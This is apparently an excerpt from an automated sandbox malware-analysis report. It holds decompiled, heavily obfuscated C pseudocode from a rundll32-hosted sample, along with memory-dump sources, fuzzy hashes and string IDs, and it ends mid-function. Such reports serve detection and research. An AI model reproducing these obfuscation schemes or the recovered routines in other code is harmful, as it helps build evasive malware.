                                                                                                                                  				_v1052 = 0xdc93e6;
                                                                                                                                  				_v1140 = 0x94ae82;
                                                                                                                                  				_v1140 = _v1140 * 0x5d;
                                                                                                                                  				_v1140 = _v1140 | 0xd08f5b59;
                                                                                                                                  				_t278 = 0x3b;
                                                                                                                                  				_v1140 = _v1140 / _t278;
                                                                                                                                  				_v1140 = _v1140 ^ 0x042b78b4;
                                                                                                                                  				_v1060 = 0xf2c7d8;
                                                                                                                                  				_v1060 = _v1060 >> 0xe;
                                                                                                                                  				_v1060 = _v1060 ^ 0x000b32e4;
                                                                                                                                  				_v1084 = 0xadf7c1;
                                                                                                                                  				_v1084 = _v1084 >> 7;
                                                                                                                                  				_v1084 = _v1084 ^ 0x0005ae79;
                                                                                                                                  				_v1068 = 0x4ca2f2;
                                                                                                                                  				_v1068 = _v1068 | 0x7f3e9315;
                                                                                                                                  				_v1068 = _v1068 ^ 0x7f77e091;
                                                                                                                                  				_v1148 = 0xfaa01c;
                                                                                                                                  				_v1148 = _v1148 | 0x0a84fcb5;
                                                                                                                                  				_t279 = 0x3d;
                                                                                                                                  				_v1148 = _v1148 / _t279;
                                                                                                                                  				_v1148 = _v1148 + 0xffff92ee;
                                                                                                                                  				_v1148 = _v1148 ^ 0x0020489e;
                                                                                                                                  				_v1104 = 0xbd50a4;
                                                                                                                                  				_v1104 = _v1104 | 0x802f8c80;
                                                                                                                                  				_v1104 = _v1104 ^ 0xe2a4d8db;
                                                                                                                                  				_v1104 = _v1104 ^ 0x621899e9;
                                                                                                                                  				_v1096 = 0x4ec4a;
                                                                                                                                  				_t280 = 0x27;
                                                                                                                                  				_v1096 = _v1096 / _t280;
                                                                                                                                  				_v1096 = _v1096 ^ 0x000ca7f0;
                                                                                                                                  				_v1156 = 0x496e13;
                                                                                                                                  				_v1156 = _v1156 << 0xb;
                                                                                                                                  				_v1156 = _v1156 + 0xffff34c4;
                                                                                                                                  				_v1156 = _v1156 ^ 0xea67072b;
                                                                                                                                  				_v1156 = _v1156 ^ 0xa10c07e0;
                                                                                                                                  				_v1132 = 0x5417d7;
                                                                                                                                  				_v1132 = _v1132 ^ 0x2d0a29d3;
                                                                                                                                  				_v1132 = _v1132 * 0x11;
                                                                                                                                  				_v1132 = _v1132 ^ 0x95d68b4c;
                                                                                                                                  				_v1132 = _v1132 ^ 0x969bce68;
                                                                                                                                  				_v1108 = 0x3d434d;
                                                                                                                                  				_t83 =  &_v1108; // 0x3d434d
                                                                                                                                  				_v1108 =  *_t83 * 0x5d;
                                                                                                                                  				_v1108 = _v1108 + 0xbd1d;
                                                                                                                                  				_v1108 = _v1108 ^ 0x16426462;
                                                                                                                                  				_v1064 = 0x905f90;
                                                                                                                                  				_v1064 = _v1064 << 7;
                                                                                                                                  				_v1064 = _v1064 ^ 0x482aff2b;
                                                                                                                                  				_v1076 = 0xa70fe8;
                                                                                                                                  				_v1076 = _v1076 ^ 0x0f6696b3;
                                                                                                                                  				_v1076 = _v1076 ^ 0x0fce7292;
                                                                                                                                  				_v1144 = 0x5add64;
                                                                                                                                  				_v1144 = _v1144 * 0x72;
                                                                                                                                  				_v1144 = _v1144 >> 2;
                                                                                                                                  				_v1144 = _v1144 + 0xffffbbe0;
                                                                                                                                  				_v1144 = _v1144 ^ 0x0a105df6;
                                                                                                                                  				_v1112 = 0xa934e1;
                                                                                                                                  				_v1112 = _v1112 + 0xffff3dc6;
                                                                                                                                  				_v1112 = _v1112 ^ 0xf71e7087;
                                                                                                                                  				_v1112 = _v1112 ^ 0xf7bbdd65;
                                                                                                                                  				_v1152 = 0xfe7bab;
                                                                                                                                  				_v1152 = _v1152 + 0xffffe121;
                                                                                                                                  				_v1152 = _v1152 << 7;
                                                                                                                                  				_v1152 = _v1152 + 0xffffae88;
                                                                                                                                  				_v1152 = _v1152 ^ 0x7f211c18;
                                                                                                                                  				_v1092 = 0x242707;
                                                                                                                                  				_v1092 = _v1092 >> 6;
                                                                                                                                  				_v1092 = _v1092 ^ 0x0003c6d8;
                                                                                                                                  				_v1136 = 0xebac4f;
                                                                                                                                  				_v1136 = _v1136 + 0x4c15;
                                                                                                                                  				_v1136 = _v1136 >> 0xf;
                                                                                                                                  				_v1136 = _v1136 ^ 0xdf38e0e8;
                                                                                                                                  				_v1136 = _v1136 ^ 0xdf3b1dfc;
                                                                                                                                  				_v1120 = 0x4eb7ab;
                                                                                                                                  				_v1120 = _v1120 << 2;
                                                                                                                                  				_v1120 = _v1120 + 0xffff85cc;
                                                                                                                                  				_v1120 = _v1120 ^ 0x01347c50;
                                                                                                                                  				_v1088 = 0xc2f923;
                                                                                                                                  				_v1088 = _v1088 * 0xf;
                                                                                                                                  				_v1088 = _v1088 ^ 0x0b6c1f22;
                                                                                                                                  				_v1080 = 0xbf02c1;
                                                                                                                                  				_v1080 = _v1080 + 0xffffcd4c;
                                                                                                                                  				_v1080 = _v1080 ^ 0x00bd8b7d;
                                                                                                                                  				_v1128 = 0xfef10;
                                                                                                                                  				_v1128 = _v1128 + 0xfa25;
                                                                                                                                  				_v1128 = _v1128 + 0xffffb342;
                                                                                                                                  				_v1128 = _v1128 + 0x2fe7;
                                                                                                                                  				_v1128 = _v1128 ^ 0x00107547;
                                                                                                                                  				_v1116 = 0x30091d;
                                                                                                                                  				_v1116 = _v1116 | 0x682f5e67;
                                                                                                                                  				_v1116 = _v1116 * 0xf;
                                                                                                                                  				_v1116 = _v1116 ^ 0x1bb1960a;
                                                                                                                                  				_v1100 = 0xdd7fbe;
                                                                                                                                  				_v1100 = _v1100 >> 0xf;
                                                                                                                                  				_v1100 = _v1100 + 0xffff26d4;
                                                                                                                                  				_v1100 = _v1100 ^ 0xfff0a895;
                                                                                                                                  				_v1072 = 0xd8d782;
                                                                                                                                  				_v1072 = _v1072 + 0xffff857d;
                                                                                                                                  				_v1072 = _v1072 ^ 0x00daabd2;
                                                                                                                                  				_v1124 = 0x615b7c;
                                                                                                                                  				_v1124 = _v1124 >> 0x10;
                                                                                                                                  				_v1124 = _v1124 * 0x3d;
                                                                                                                                  				_v1124 = _v1124 ^ 0x000147a1;
                                                                                                                                  				L1:
                                                                                                                                  				while(_t250 != 0x1242b9) {
                                                                                                                                  					if(_t250 == 0x56337fc) {
                                                                                                                                  						E002E6C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
                                                                                                                                  						_push(_v1088);
                                                                                                                                  						_push( &_v520);
                                                                                                                                  						_push(_v1120);
                                                                                                                                  						E002F13AD(_v1136,  &_v1040, __eflags);
                                                                                                                                  						_t283 =  &(_t283[6]);
                                                                                                                                  						_t250 = 0x8d6676f;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t250 == 0x5f94146) {
                                                                                                                                  						_push(_v1148);
                                                                                                                                  						_push(_v1068);
                                                                                                                                  						_t241 = E002EDCF7(_v1084, 0x2d1000, __eflags);
                                                                                                                                  						_t256 =  *0x2f3e10; // 0x0
                                                                                                                                  						_t272 =  *0x2f3e10; // 0x0
                                                                                                                                  						E002D47CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
                                                                                                                                  						E002DA8B0(_v1064, _t241, _v1076);
                                                                                                                                  						_t283 =  &(_t283[9]);
                                                                                                                                  						_t250 = 0x56337fc;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t250 == 0x8d6676f) {
                                                                                                                                  						_t244 = E002DB6CF( &_v1040, _v1080, _v1128, _v1116);
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						 *_t244 = 0;
                                                                                                                                  						return E002DB1C6( &_v1040, _v1100, _v1072, _v1124);
                                                                                                                                  					}
                                                                                                                                  					if(_t250 == 0xbcbde3e) {
                                                                                                                                  						_t247 = E002E473C();
                                                                                                                                  						L8:
                                                                                                                                  						_t250 = 0x5f94146;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t250 != 0xf4317dc) {
                                                                                                                                  						L15:
                                                                                                                                  						__eflags = _t250 - 0xfb0317f;
                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						return _t247;
                                                                                                                                  					}
                                                                                                                                  					_t247 = E002D3E3F();
                                                                                                                                  					goto L8;
                                                                                                                                  				}
                                                                                                                                  				_t236 =  *0x2f3e10; // 0x0
                                                                                                                                  				__eflags =  *((intOrPtr*)(_t236 + 0x450));
                                                                                                                                  				if(__eflags == 0) {
                                                                                                                                  					_t250 = 0xf4317dc;
                                                                                                                                  					goto L15;
                                                                                                                                  				}
                                                                                                                                  				_t250 = 0xbcbde3e;
                                                                                                                                  				goto L1;
                                                                                                                                  			}

                                                                                                                                  0x002e80cd
                                                                                                                                  0x002e80d2
                                                                                                                                  0x002e80da
                                                                                                                                  0x002e80e2
                                                                                                                                  0x002e80ea
                                                                                                                                  0x002e80f2
                                                                                                                                  0x002e80fa
                                                                                                                                  0x002e8102
                                                                                                                                  0x002e810c
                                                                                                                                  0x002e8110
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8118
                                                                                                                                  0x002e812a
                                                                                                                                  0x002e81f0
                                                                                                                                  0x002e81f5
                                                                                                                                  0x002e8200
                                                                                                                                  0x002e8201
                                                                                                                                  0x002e8210
                                                                                                                                  0x002e8215
                                                                                                                                  0x002e8218
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8218
                                                                                                                                  0x002e8132
                                                                                                                                  0x002e8164
                                                                                                                                  0x002e816d
                                                                                                                                  0x002e8175
                                                                                                                                  0x002e8186
                                                                                                                                  0x002e819e
                                                                                                                                  0x002e81b1
                                                                                                                                  0x002e81c6
                                                                                                                                  0x002e81cb
                                                                                                                                  0x002e81ce
                                                                                                                                  0x00000000
                                                                                                                                  0x002e81ce
                                                                                                                                  0x002e813a
                                                                                                                                  0x002e825a
                                                                                                                                  0x002e8263
                                                                                                                                  0x002e826d
                                                                                                                                  0x00000000
                                                                                                                                  0x002e827c
                                                                                                                                  0x002e8142
                                                                                                                                  0x002e815d
                                                                                                                                  0x002e8155
                                                                                                                                  0x002e8155
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8155
                                                                                                                                  0x002e8146
                                                                                                                                  0x002e8239
                                                                                                                                  0x002e8239
                                                                                                                                  0x002e823f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e823f
                                                                                                                                  0x002e8150
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8150
                                                                                                                                  0x002e8222
                                                                                                                                  0x002e8227
                                                                                                                                  0x002e822e
                                                                                                                                  0x002e8237
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8237
                                                                                                                                  0x002e8230
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: MC=$g^/h$|[a$/
                                                                                                                                  • API String ID: 0-1545830693
                                                                                                                                  • Opcode ID: d9bf2458a9a40e101157f4862dc6e4811edd92f04b16fd1a26a95f7a1cb3c2e7
                                                                                                                                  • Instruction ID: f347692879094bdbb68699119cc1ae0687cb5150b21b379a797b99c428053f5d
                                                                                                                                  • Opcode Fuzzy Hash: d9bf2458a9a40e101157f4862dc6e4811edd92f04b16fd1a26a95f7a1cb3c2e7
                                                                                                                                  • Instruction Fuzzy Hash: E6C110B11183818FC368CF26C58A51FFBE1FBC0758F508A1DF59696260D7B58A5ACF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002EA2E8(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				intOrPtr _t184;
                                                                                                                                  				intOrPtr* _t189;
                                                                                                                                  				intOrPtr _t193;
                                                                                                                                  				intOrPtr _t196;
                                                                                                                                  				intOrPtr _t197;
                                                                                                                                  				intOrPtr _t198;
                                                                                                                                  				intOrPtr _t204;
                                                                                                                                  				intOrPtr _t205;
                                                                                                                                  				signed int _t223;
                                                                                                                                  				signed int _t224;
                                                                                                                                  				signed int _t225;
                                                                                                                                  				intOrPtr _t226;
                                                                                                                                  				void* _t228;
                                                                                                                                  				signed int _t229;
                                                                                                                                  				intOrPtr _t230;
                                                                                                                                  				signed int* _t231;
                                                                                                                                  
                                                                                                                                  				_t198 = __ecx;
                                                                                                                                  				_t231 =  &_v92;
                                                                                                                                  				_v8 = __edx;
                                                                                                                                  				_v24 = __ecx;
                                                                                                                                  				_v28 = 0x24c7b9;
                                                                                                                                  				_v28 = _v28 << 9;
                                                                                                                                  				_v28 = _v28 ^ 0x498f7200;
                                                                                                                                  				_v76 = 0x5897f7;
                                                                                                                                  				_v76 = _v76 + 0xffffedf4;
                                                                                                                                  				_v76 = _v76 << 0xf;
                                                                                                                                  				_v76 = _v76 + 0x73e5;
                                                                                                                                  				_v76 = _v76 ^ 0x42f7f56f;
                                                                                                                                  				_v52 = 0x46ab19;
                                                                                                                                  				_v52 = _v52 << 0xd;
                                                                                                                                  				_t228 = 0xe611c04;
                                                                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                                                                  				_t223 = 0x66;
                                                                                                                                  				_v52 = _v52 / _t223;
                                                                                                                                  				_v52 = _v52 ^ 0x0211beab;
                                                                                                                                  				_v80 = 0x97c948;
                                                                                                                                  				_v80 = _v80 ^ 0xfb972484;
                                                                                                                                  				_v80 = _v80 << 2;
                                                                                                                                  				_v80 = _v80 << 0xf;
                                                                                                                                  				_v80 = _v80 ^ 0xdb950905;
                                                                                                                                  				_v44 = 0x96980f;
                                                                                                                                  				_v44 = _v44 ^ 0xfeb8bb56;
                                                                                                                                  				_v44 = _v44 ^ 0xfe2f3013;
                                                                                                                                  				_v64 = 0x454cfa;
                                                                                                                                  				_v64 = _v64 ^ 0x45fe36ac;
                                                                                                                                  				_t224 = 0x43;
                                                                                                                                  				_v64 = _v64 / _t224;
                                                                                                                                  				_v64 = _v64 ^ 0x010b84d0;
                                                                                                                                  				_v68 = 0xb73a82;
                                                                                                                                  				_v68 = _v68 | 0xd419dac3;
                                                                                                                                  				_t225 = 0x23;
                                                                                                                                  				_v68 = _v68 / _t225;
                                                                                                                                  				_v68 = _v68 ^ 0x061f1f3c;
                                                                                                                                  				_v60 = 0xe80863;
                                                                                                                                  				_v60 = _v60 * 7;
                                                                                                                                  				_v60 = _v60 ^ 0x88fb80a0;
                                                                                                                                  				_v60 = _v60 ^ 0x8ea007f2;
                                                                                                                                  				_v40 = 0x80f530;
                                                                                                                                  				_v40 = _v40 ^ 0xcef24483;
                                                                                                                                  				_v40 = _v40 ^ 0xce7935e2;
                                                                                                                                  				_v92 = 0x233377;
                                                                                                                                  				_v92 = _v92 ^ 0x61e14959;
                                                                                                                                  				_v92 = _v92 + 0xffffa5e4;
                                                                                                                                  				_v92 = _v92 + 0xf94b;
                                                                                                                                  				_v92 = _v92 ^ 0x61c7ad44;
                                                                                                                                  				_v88 = 0xbad9cc;
                                                                                                                                  				_v88 = _v88 | 0x5a2a09a8;
                                                                                                                                  				_v88 = _v88 * 0x2f;
                                                                                                                                  				_v88 = _v88 | 0xecc1c683;
                                                                                                                                  				_v88 = _v88 ^ 0xecc3849f;
                                                                                                                                  				_v56 = 0xb0d301;
                                                                                                                                  				_v56 = _v56 + 0xa0bb;
                                                                                                                                  				_v56 = _v56 << 0xf;
                                                                                                                                  				_v56 = _v56 ^ 0xb9db0742;
                                                                                                                                  				_v36 = 0xab48cf;
                                                                                                                                  				_v36 = _v36 * 0x24;
                                                                                                                                  				_v36 = _v36 ^ 0x1811952a;
                                                                                                                                  				_v84 = 0x104632;
                                                                                                                                  				_v84 = _v84 + 0x4a21;
                                                                                                                                  				_v84 = _v84 ^ 0x8dbd106a;
                                                                                                                                  				_v84 = _v84 + 0xfe54;
                                                                                                                                  				_v84 = _v84 ^ 0x8daed025;
                                                                                                                                  				_t226 = _v4;
                                                                                                                                  				_t197 = _v8;
                                                                                                                                  				_t230 = _v8;
                                                                                                                                  				_v72 = 0x1611ea;
                                                                                                                                  				_v72 = _v72 ^ 0xe055e86d;
                                                                                                                                  				_v72 = _v72 >> 0xd;
                                                                                                                                  				_v72 = _v72 >> 5;
                                                                                                                                  				_v72 = _v72 ^ 0x0003993e;
                                                                                                                                  				_v32 = 0x799484;
                                                                                                                                  				_v32 = _v32 ^ 0xb4488d59;
                                                                                                                                  				_v32 = _v32 ^ 0xb439947f;
                                                                                                                                  				L1:
                                                                                                                                  				while(1) {
                                                                                                                                  					do {
                                                                                                                                  						while(_t228 != 0x5161e0c) {
                                                                                                                                  							if(_t228 == 0xb95f952) {
                                                                                                                                  								_t229 = E002EC032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
                                                                                                                                  								_t231 =  &(_t231[5]);
                                                                                                                                  								_v20 = _t229;
                                                                                                                                  								if(_t229 == 0) {
                                                                                                                                  									L18:
                                                                                                                                  									E002E8519(_v72, _v32, _t197);
                                                                                                                                  								} else {
                                                                                                                                  									_t204 = _v16;
                                                                                                                                  									if(_t204 == 0) {
                                                                                                                                  										L17:
                                                                                                                                  										if(_t229 != 0) {
                                                                                                                                  											_t189 = _v8;
                                                                                                                                  											 *_t189 = _t197;
                                                                                                                                  											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
                                                                                                                                  										} else {
                                                                                                                                  											goto L18;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										_v48 = _v48 + _t204;
                                                                                                                                  										_t230 = _t230 - _t204;
                                                                                                                                  										if(_t230 != 0) {
                                                                                                                                  											L10:
                                                                                                                                  											_t184 = _v48;
                                                                                                                                  											L11:
                                                                                                                                  											_t198 = _v24;
                                                                                                                                  											_t228 = 0xb95f952;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											_t205 = _t226 + _t226;
                                                                                                                                  											_push(_t205);
                                                                                                                                  											_push(_t205);
                                                                                                                                  											_v12 = _t205;
                                                                                                                                  											_t193 = E002D7FF2(_t205);
                                                                                                                                  											_v48 = _t193;
                                                                                                                                  											if(_t193 == 0) {
                                                                                                                                  												goto L17;
                                                                                                                                  											} else {
                                                                                                                                  												E002DED7E(_v88, _t193, _v56, _t197, _t226);
                                                                                                                                  												E002E8519(_v36, _v84, _t197);
                                                                                                                                  												_t197 = _v48;
                                                                                                                                  												_t230 = _t226;
                                                                                                                                  												_t231 =  &(_t231[4]);
                                                                                                                                  												_t196 = _t197 + _t226;
                                                                                                                                  												_t226 = _v12;
                                                                                                                                  												_v48 = _t196;
                                                                                                                                  												if(_t230 == 0) {
                                                                                                                                  													goto L17;
                                                                                                                                  												} else {
                                                                                                                                  													goto L10;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t228 != 0xe611c04) {
                                                                                                                                  									goto L15;
                                                                                                                                  								} else {
                                                                                                                                  									_t228 = 0x5161e0c;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L20:
                                                                                                                                  							return _t229;
                                                                                                                                  						}
                                                                                                                                  						_t226 = 0x10000;
                                                                                                                                  						_push(_t198);
                                                                                                                                  						_push(_t198);
                                                                                                                                  						_t184 = E002D7FF2(0x10000);
                                                                                                                                  						_t197 = _t184;
                                                                                                                                  						if(_t197 == 0) {
                                                                                                                                  							_t198 = _v24;
                                                                                                                                  							_t228 = 0xa3056fc;
                                                                                                                                  							goto L15;
                                                                                                                                  						} else {
                                                                                                                                  							_v48 = _t184;
                                                                                                                                  							_t230 = 0x10000;
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						goto L20;
                                                                                                                                  						L15:
                                                                                                                                  						_t184 = _v48;
                                                                                                                                  					} while (_t228 != 0xa3056fc);
                                                                                                                                  					_t229 = _v20;
                                                                                                                                  					goto L17;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x002ea533
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea539
                                                                                                                                  0x002ea539
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea539
                                                                                                                                  0x002ea533
                                                                                                                                  0x002ea65d
                                                                                                                                  0x002ea665
                                                                                                                                  0x002ea665
                                                                                                                                  0x002ea5f5
                                                                                                                                  0x002ea604
                                                                                                                                  0x002ea605
                                                                                                                                  0x002ea606
                                                                                                                                  0x002ea60b
                                                                                                                                  0x002ea611
                                                                                                                                  0x002ea61b
                                                                                                                                  0x002ea61f
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea613
                                                                                                                                  0x002ea613
                                                                                                                                  0x002ea617
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea617
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea624
                                                                                                                                  0x002ea624
                                                                                                                                  0x002ea628
                                                                                                                                  0x002ea634
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea634

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !J$YIa$mU$s
                                                                                                                                  • API String ID: 0-3335770892
                                                                                                                                  • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                  • Instruction ID: 9e27cfb7f098f49b07fcf8150a113337535ef4f4b80bfc8384cc08fef83f2257
                                                                                                                                  • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                  • Instruction Fuzzy Hash: 68913F719193819FC354CF2AC18580BFBF1BBD5758F908A1EF99597260D3B4DA188B83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002E0001(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                  				char _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				intOrPtr _v136;
                                                                                                                                  				intOrPtr _v140;
                                                                                                                                  				char _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				signed int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				signed int _v196;
                                                                                                                                  				signed int _v200;
                                                                                                                                  				signed int _v204;
                                                                                                                                  				void* _t154;
                                                                                                                                  				void* _t174;
                                                                                                                                  				char _t178;
                                                                                                                                  				void* _t183;
                                                                                                                                  				char* _t189;
                                                                                                                                  				void* _t209;
                                                                                                                                  				signed int _t210;
                                                                                                                                  				signed int _t211;
                                                                                                                                  				signed int _t212;
                                                                                                                                  				signed int _t213;
                                                                                                                                  				signed int _t214;
                                                                                                                                  				signed int _t215;
                                                                                                                                  				signed int _t216;
                                                                                                                                  				signed int* _t220;
                                                                                                                                  
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_t209 = __edx;
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t154);
                                                                                                                                  				_v132 = _v132 & 0x00000000;
                                                                                                                                  				_t220 =  &(( &_v204)[3]);
                                                                                                                                  				_v140 = 0x6f537b;
                                                                                                                                  				_v136 = 0x2895cf;
                                                                                                                                  				_t183 = 0xf669bfa;
                                                                                                                                  				_v164 = 0xc3509d;
                                                                                                                                  				_v164 = _v164 >> 0xf;
                                                                                                                                  				_v164 = _v164 ^ 0x0007728b;
                                                                                                                                  				_v188 = 0x58efa0;
                                                                                                                                  				_v188 = _v188 + 0xffff9444;
                                                                                                                                  				_t210 = 0x2f;
                                                                                                                                  				_v188 = _v188 / _t210;
                                                                                                                                  				_v188 = _v188 ^ 0x000ac4b2;
                                                                                                                                  				_v176 = 0xa783cc;
                                                                                                                                  				_v176 = _v176 << 0xa;
                                                                                                                                  				_v176 = _v176 ^ 0x73295065;
                                                                                                                                  				_v176 = _v176 ^ 0xed239367;
                                                                                                                                  				_v148 = 0x42262a;
                                                                                                                                  				_v148 = _v148 | 0x228e56d6;
                                                                                                                                  				_v148 = _v148 ^ 0x22cd87d0;
                                                                                                                                  				_v204 = 0xc47428;
                                                                                                                                  				_v204 = _v204 + 0xffff2e33;
                                                                                                                                  				_v204 = _v204 + 0xffff2fa2;
                                                                                                                                  				_v204 = _v204 + 0xffff28a7;
                                                                                                                                  				_v204 = _v204 ^ 0x00c63754;
                                                                                                                                  				_v156 = 0x11bd56;
                                                                                                                                  				_t211 = 0x5c;
                                                                                                                                  				_v156 = _v156 * 0x6a;
                                                                                                                                  				_v156 = _v156 ^ 0x0752342f;
                                                                                                                                  				_v172 = 0x489beb;
                                                                                                                                  				_v172 = _v172 + 0xfe21;
                                                                                                                                  				_v172 = _v172 / _t211;
                                                                                                                                  				_v172 = _v172 ^ 0x0000a4d4;
                                                                                                                                  				_v192 = 0x2e5859;
                                                                                                                                  				_v192 = _v192 ^ 0x83ba67d9;
                                                                                                                                  				_t212 = 0x44;
                                                                                                                                  				_v192 = _v192 / _t212;
                                                                                                                                  				_v192 = _v192 ^ 0x01e00d99;
                                                                                                                                  				_v180 = 0x89bc6d;
                                                                                                                                  				_v180 = _v180 | 0xb1d25d45;
                                                                                                                                  				_v180 = _v180 << 0xe;
                                                                                                                                  				_v180 = _v180 ^ 0xff5cc309;
                                                                                                                                  				_v168 = 0x19805c;
                                                                                                                                  				_t213 = 0x18;
                                                                                                                                  				_v168 = _v168 * 0x16;
                                                                                                                                  				_v168 = _v168 ^ 0x4d2845a5;
                                                                                                                                  				_v168 = _v168 ^ 0x4f1adce1;
                                                                                                                                  				_v196 = 0x9cfdcd;
                                                                                                                                  				_v196 = _v196 / _t213;
                                                                                                                                  				_v196 = _v196 + 0xd8a6;
                                                                                                                                  				_v196 = _v196 ^ 0x0005e56c;
                                                                                                                                  				_v200 = 0x1d77da;
                                                                                                                                  				_t214 = 0x6b;
                                                                                                                                  				_v200 = _v200 / _t214;
                                                                                                                                  				_t215 = 9;
                                                                                                                                  				_v200 = _v200 / _t215;
                                                                                                                                  				_t216 = 0x59;
                                                                                                                                  				_v200 = _v200 / _t216;
                                                                                                                                  				_v200 = _v200 ^ 0x00052bad;
                                                                                                                                  				_v184 = 0x474669;
                                                                                                                                  				_v184 = _v184 * 0x25;
                                                                                                                                  				_v184 = _v184 + 0xffff8141;
                                                                                                                                  				_v184 = _v184 ^ 0x0a4cf000;
                                                                                                                                  				_v160 = 0x98ddfb;
                                                                                                                                  				_v160 = _v160 << 3;
                                                                                                                                  				_v160 = _v160 ^ 0x04cf55b1;
                                                                                                                                  				_v152 = 0xbbc225;
                                                                                                                                  				_v152 = _v152 * 0x58;
                                                                                                                                  				_v152 = _v152 ^ 0x408ec409;
                                                                                                                                  				while(_t183 != 0x4a2a3c4) {
                                                                                                                                  					if(_t183 == 0x640e5f9) {
                                                                                                                                  						__eflags = _v128;
                                                                                                                                  						_t189 =  &_v128;
                                                                                                                                  						while(__eflags != 0) {
                                                                                                                                  							_t178 =  *_t189;
                                                                                                                                  							__eflags = _t178 - 0x30;
                                                                                                                                  							if(_t178 < 0x30) {
                                                                                                                                  								L10:
                                                                                                                                  								__eflags = _t178 - 0x61;
                                                                                                                                  								if(_t178 < 0x61) {
                                                                                                                                  									L12:
                                                                                                                                  									__eflags = _t178 - 0x41;
                                                                                                                                  									if(_t178 < 0x41) {
                                                                                                                                  										L14:
                                                                                                                                  										 *_t189 = 0x58;
                                                                                                                                  									} else {
                                                                                                                                  										__eflags = _t178 - 0x5a;
